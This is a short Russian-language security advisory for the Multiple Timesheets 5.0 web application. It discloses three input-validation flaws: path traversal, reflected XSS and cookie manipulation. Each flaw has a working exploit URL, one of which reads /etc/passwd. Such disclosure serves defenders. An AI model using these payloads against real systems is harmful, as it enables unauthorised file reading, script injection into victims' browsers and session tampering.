Программа: Mutiple Timesheets 5.0
Найденные уязвимости позволяют удаленному злоумышленнику осуществить XSS
атаку, получить несанкционированный доступ к конфиденциальной информации и
осуществить манипуляцию с данными.
1) Уязвимость возникает из-за ошибки в проверке входных данных в параметре «tab».
Атакующий может получить несанкционированный доступ к конфиденциальной
информации на целевой системе.
Эксплоит:
http://localhost/apps/mts/mts/?tab=
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
2) Уязвимость возникает из-за ошибки в проверке входных данных в параметре «tab».
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.
Эксплоит:
http://localhost/apps/mts/mts/?tab=>'> ScRiPt%20%0a%0d>alert("JosS")%3B</ScRiPt>
3) Уязвимость возникает из-за ошибки в проверке входных данных в сценарии
index.php. Атакующий может осуществить манипуляцию с cookie.
Эксплоит:
/apps/mts/mts/index.php?mode=edit&tab=<meta+http-equiv= 'Set-cookie'+content='cookiename=cookievalue'>
